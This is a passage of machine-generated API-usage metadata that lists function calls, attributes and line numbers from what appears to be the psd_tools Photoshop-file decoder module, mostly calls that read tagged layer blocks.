"psd_tools.debug.pretty_namedtuple", "line_number": 92, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 93, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 94, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 97, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 99, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 101, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 103, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 104, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 105, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 107, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 108, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 109, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 110, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 113, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 115, "usage_type": "call"}, {"api_name": "psd_tools.debug.pretty_namedtuple", "line_number": 119, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 123, "usage_type": "call"}, {"api_name": "psd_tools.constants.SectionDivider.name_of", "line_number": 126, "usage_type": "call"}, {"api_name": "psd_tools.constants.SectionDivider", "line_number": 126, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.is_known", "line_number": 142, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 142, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 143, "usage_type": "call"}, {"api_name": "psd_tools.reader.layers.Block", "line_number": 146, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 151, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 152, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.decode_descriptor", "line_number": 155, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.UnknownOSType", "line_number": 156, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 157, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.SOLID_COLOR_SHEET_SETTING", "line_number": 161, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 161, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.PATTERN_FILL_SETTING", "line_number": 166, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 166, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.GRADIENT_FILL_SETTING", "line_number": 171, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 171, "usage_type": "name"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 178, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 178, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.BRIGHTNESS_AND_CONTRAST", "line_number": 176, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 176, "usage_type": "name"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 184, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 188, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 189, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 194, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 196, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 197, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.LEVELS", "line_number": 181, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 181, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 205, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 206, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 208, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 215, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 216, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 220, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 223, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 224, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.CURVES", "line_number": 203, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 203, "usage_type": "name"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 232, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 232, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.EXPOSURE", "line_number": 230, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 230, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.VIBRANCE", "line_number": 235, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 235, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 243, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 244, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 246, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 248, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 249, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 252, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 253, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.HUE_SATURATION_V4", "line_number": 240, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 240, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.HUE_SATURATION", "line_number": 241, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 241, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 262, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 263, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 264, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 265, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 266, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.COLOR_BALANCE", "line_number": 259, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 259, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.BLACK_AND_WHITE", "line_number": 270, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 270, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 277, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 278, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 280, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 283, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 288, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 289, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 290, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.PHOTO_FILTER", "line_number": 275, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 275, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 297, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 298, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 299, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.CHANNEL_MIXER", "line_number": 295, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 295, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 305, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 306, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.decode_descriptor", "line_number": 310, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.UnknownOSType", "line_number": 311, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 312, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.COLOR_LOOKUP", "line_number": 303, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 303, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.INVERT", "line_number": 316, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 316, "usage_type": "name"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 323, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 323, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.POSTERIZE", "line_number": 321, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 321, "usage_type": "name"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 328, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 328, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.THRESHOLD", "line_number": 326, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 326, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 333, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 334, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 336, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 338, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.SELECTIVE_COLOR", "line_number": 331, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 331, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 346, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 349, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.PATTERNS1", "line_number": 342, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 342, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.PATTERNS2", "line_number": 343, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 343, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.PATTERNS3", "line_number": 344, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 344, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 360, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 361, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 363, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 366, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_unicode_string", "line_number": 367, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_pascal_string", "line_number": 368, "usage_type": "call"}, {"api_name": "psd_tools.constants.ColorMode.INDEXED", "line_number": 370, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.ColorMode", "line_number": 370, "usage_type": "name"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 371, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 372, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 379, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 381, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 384, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 385, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 388, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 391, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 394, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 395, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 396, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.RawData", "line_number": 397, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 405, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 406, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 408, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_unicode_string", "line_number": 410, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 411, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 414, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 415, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 417, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 418, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 421, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 423, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 425, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 427, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 428, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 429, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 430, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 431, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.GRADIENT_MAP_SETTING", "line_number": 403, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 403, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 442, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 443, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.decode_descriptor", "line_number": 445, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.UnknownOSType", "line_number": 447, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 448, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.EXPORT_DATA", "line_number": 440, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 440, "usage_type": "name"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 454, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 454, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.REFERENCE_POINT", "line_number": 452, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 452, "usage_type": "name"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 459, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 459, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.SHEET_COLOR_SETTING", "line_number": 457, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 457, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.SECTION_DIVIDER_SETTING", "line_number": 465, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 465, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.SECTION_DIVIDER_SETTING", "line_number": 462, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 462, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.NESTED_SECTION_DIVIDER_SETTING", "line_number": 471, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 471, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.NESTED_SECTION_DIVIDER_SETTING", "line_number": 468, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 468, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 475, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 477, "usage_type": "call"}, {"api_name": "psd_tools.constants.SectionDivider.is_known", "line_number": 478, "usage_type": "call"}, {"api_name": "psd_tools.constants.SectionDivider", "line_number": 478, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 479, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 484, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 493, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 494, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.decode_descriptor", "line_number": 495, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.PLACED_LAYER_DATA", "line_number": 490, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 490, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.SMART_OBJECT_PLACED_LAYER_DATA", "line_number": 491, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 491, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 501, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 502, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 505, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.decode_descriptor", "line_number": 509, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.UnknownOSType", "line_number": 511, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 512, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.VECTOR_STROKE_DATA", "line_number": 499, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 499, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 518, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 519, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 522, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.decode_descriptor", "line_number": 526, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.UnknownOSType", "line_number": 527, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 528, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.VECTOR_STROKE_CONTENT_DATA", "line_number": 516, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 516, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 536, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 537, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 543, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 545, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 554, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 555, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.decode_descriptor", "line_number": 557, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.UnknownOSType", "line_number": 558, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 561, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.METADATA_SETTING", "line_number": 534, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 534, "usage_type": "name"}, {"api_name": "psd_tools.utils.unpack", "line_number": 570, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.PROTECTED_SETTING", "line_number": 568, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 568, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 582, "usage_type": "call"}, {"api_name": "psd_tools.reader.layers", "line_number": 583, "usage_type": "name"}, {"api_name": "psd_tools.reader.layers._read_layers", "line_number": 583, "usage_type": "call"}, {"api_name": "psd_tools.decoder.decoder.decode_layers", "line_number": 584, "usage_type": "call"}, {"api_name": "psd_tools.reader.layers", "line_number": 584, "usage_type": "argument"}, {"api_name": "psd_tools.constants.TaggedBlock.LAYER_32", "line_number": 578, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 578, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 591, "usage_type": "call"}, {"api_name": "psd_tools.reader.layers", "line_number": 592, "usage_type": "name"}, {"api_name": "psd_tools.reader.layers._read_layers", "line_number": 592, "usage_type": "call"}, {"api_name": "psd_tools.decoder.decoder.decode_layers", "line_number": 593, "usage_type": "call"}, {"api_name": "psd_tools.reader.layers", "line_number": 593, "usage_type": "argument"}, {"api_name": "psd_tools.constants.TaggedBlock.LAYER_16", "line_number": 587, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 587, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 598, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 599, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 603, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.decode_descriptor", "line_number": 607, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.UnknownOSType", "line_number": 608, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 609, "usage_type": "call"}, {"api_name": "psd_tools.decoder.engine_data.decode", "line_number": 616, "usage_type": "call"}, {"api_name": "psd_tools.decoder.engine_data", "line_number": 616, "usage_type": "name"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 618, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 620, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.decode_descriptor", "line_number": 624, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.UnknownOSType", "line_number": 625, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 626, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 629, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.TYPE_TOOL_OBJECT_SETTING", "line_number": 596, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 596, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.CONTENT_GENERATOR_EXTRA_DATA", "line_number": 636, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 636, "usage_type": "name"}, {"api_name": "psd_tools.decoder.engine_data.decode", "line_number": 643, "usage_type": "call"}, {"api_name": "psd_tools.decoder.engine_data", "line_number": 643, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.TEXT_ENGINE_DATA", "line_number": 641, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 641, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 651, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.UNICODE_PATH_NAME", "line_number": 646, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 646, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.ANIMATION_EFFECTS", "line_number": 655, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 655, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 662, "usage_type": "call"}, {"api_name": "psd_tools.decoder.color.decode_color", "line_number": 663, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 664, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.FILTER_MASK", "line_number": 660, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 660, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 670, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 671, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 674, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.decode_descriptor", "line_number": 678, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.UnknownOSType", "line_number": 679, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 680, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.VECTOR_ORIGINATION_DATA", "line_number": 668, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 668, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.PIXEL_SOURCE_DATA1", "line_number": 686, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 686, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 693, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 694, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.PIXEL_SOURCE_DATA2", "line_number": 691, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 691, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 701, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 702, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 706, "usage_type": "call"}, {"api_name": "psd_tools.decoder.path.decode_path_resource", "line_number": 710, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.VECTOR_MASK_SETTING1", "line_number": 698, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 698, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.VECTOR_MASK_SETTING2", "line_number": 699, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 699, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.ARTBOARD_DATA1", "line_number": 715, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 715, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.ARTBOARD_DATA2", "line_number": 716, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 716, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.ARTBOARD_DATA3", "line_number": 717, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 717, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 725, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 726, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 728, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_pascal_string", "line_number": 730, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 731, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 732, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 733, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.decode_descriptor", "line_number": 734, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.PLACED_LAYER_OBSOLETE1", "line_number": 722, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 722, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.PLACED_LAYER_OBSOLETE2", "line_number": 723, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 723, "usage_type": "name"}, {"api_name": "psd_tools.decoder.linked_layer.decode", "line_number": 746, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.LINKED_LAYER1", "line_number": 740, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 740, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.LINKED_LAYER2", "line_number": 741, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 741, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.LINKED_LAYER3", "line_number": 742, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 742, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.LINKED_LAYER_EXTERNAL", "line_number": 743, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 743, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 753, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 755, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.CHANNEL_BLENDING_RESTRICTIONS_SETTING", "line_number": 749, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 749, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 762, "usage_type": "call"}, {"api_name": "psd_tools.decoder.color.decode_color", "line_number": 763, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 764, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.USER_MASK", "line_number": 760, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 760, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 772, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 773, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 775, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.FILTER_EFFECTS1", "line_number": 768, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 768, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.FILTER_EFFECTS2", "line_number": 769, "usage_type": "attribute"}, {"api_name": 